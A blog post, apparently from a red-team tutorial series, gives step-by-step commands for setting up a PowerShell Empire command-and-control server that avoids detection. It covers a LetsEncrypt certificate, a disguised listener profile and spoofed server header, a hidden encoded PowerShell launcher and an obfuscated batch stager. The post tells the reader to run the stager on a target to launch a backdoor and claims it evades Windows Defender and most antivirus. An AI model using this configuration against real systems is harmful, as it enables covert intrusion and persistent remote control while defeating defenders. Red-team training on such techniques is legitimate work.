RED TEAM TUTORIALS — №2

Encrypting Empire traffic

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Empire Magic

GO THE EXTRA MILE

Stop being lazy. Stop using the default options that come with your favourite hacking tools. To avoid detection, you need play smart. Because believe it or not, Hunters (or: Blue Teamers) are becoming smarter every day.

In this tutorial, I will not only focus on the (proper) use of SSL but I will also show you some of the options that need changing to avoid detection. The options I set are in no way conclusive, but merely a way to show you that the defaults are easily fingerprintable. So, go the extra mile!

I trust that you know how to set up an Empire listener by now. If this is new to you, follow this tutorial first to get familiar with PowerShell Empire.

1. Register a domain

First, register a domain for your C2 server or create a subdomain on an existing domain. This is not only a mandatory step for a valid SSL certificate, but it also allows you to move your C2 infrastructure to another hosting company or IP address. With just one DNS update, all of your backdoors will be able to find your C2 server.

2. Use LetsEncrypt to create an SSL certificate

To avoid detection because of fingerprintable SSL certificates, you should create your own custom SSL certificates. Luckily, that’s where LetsEncrypt comes in. A nonprofit Certificate Authority providing TLS certificates to 260 million websites for free (!).

  • Go to certbot.eff.org
  • For software, choose None of the above
  • For system, choose your OS. In my case: Ubuntu 20.04
  • Follow the instructions to install Certbot on your C2 server
  • Then, request a certificate using the --standalone option:
    # certbot certonly --standalone -d YOURDOMAINHERE
  • If everything went okay, your certificate should be in this directory: /etc/letsencrypt/live/YOURDOMAINHERE

To make this brand new certificate ready for Empire, follow these few easy steps:

  • Create a directory to save the new certificate in:
    # mkdir /opt/ssl
  • Symlink LetsEncrypt's fullchain to the new directory, but using the naming convention of Empire:
    # ln -s /etc/letsencrypt/live/YOURDOMAINHERE/fullchain.pem /opt/ssl/empire-chain.pem
  • Symlink LetsEncrypt's privkey to the new directory, again using the naming convention of Empire:
    # ln -s /etc/letsencrypt/live/YOURDOMAINHERE/privkey.pem /opt/ssl/empire-priv.key

SIDENOTE

You could increase your OpSec by using Cloudflare instead of LetsEncrypt. The downside is that you can only use WEB ports for your C2 connections because Cloudflare only forwards WEB traffic to your IP address.

3. Empire Magic

No issues so far? Good! Let's continue…

Using a proper SSL certificate is not the only thing you’ll need to evade the Hunters. Below, you’ll see me change some default options to limit the risk of any detection rules going off. Start Empire and issue the following commands:

listeners
uselistener http
set Name http
set Host https://YOURDOMAINHERE:443
set Port 443
set Launcher powershell.exe -nop -w hidden -e
set DefaultProfile /wp_includes/microsoft.php|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36|Accept:*/*
set CertPath /opt/ssl/
set Headers Server:cloudflare
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
execute

After that, set up the stager:

listeners
usestager windows/launcher_bat
set Listener http
set Obfuscate True
set ObfuscateCommand Token\String\1,1,2,1, Token\Variable\1
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
set AMSIBypass False
execute

If you set option OutFile, the output will be in the filename mentioned (default: /tmp/launcher.bat). Just copy the file (or the contents) to your target and double click to launch your backdoor.

That’s it! This should have evaded Windows Defender and most antivirus software. Good job!

RED TEAM TUTORIALS

With the ongoing shift from Red Teaming to Purple Teaming, Hunters (or: Blue Teamers) are becoming smarter in spotting and countering attacks from Hackers. The reason? Hackers and Hunters are finally learning from each other.

This tutorial is one of a few, written for Hackers to better hide your backdoors from Hunters. Check out my Medium page for more Red Team tutorials.

--

--

--

Founder // Hacker @ Chapter8.com

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Crypt0jan

Crypt0jan

Founder // Hacker @ Chapter8.com

More from Medium

Tryhackme : Juicy Details Writeup

Log4J / Log4Shell

Things I learned this week about Log4JShell Vulnerability

Custom Metasploit Module for Log4Shell Scanner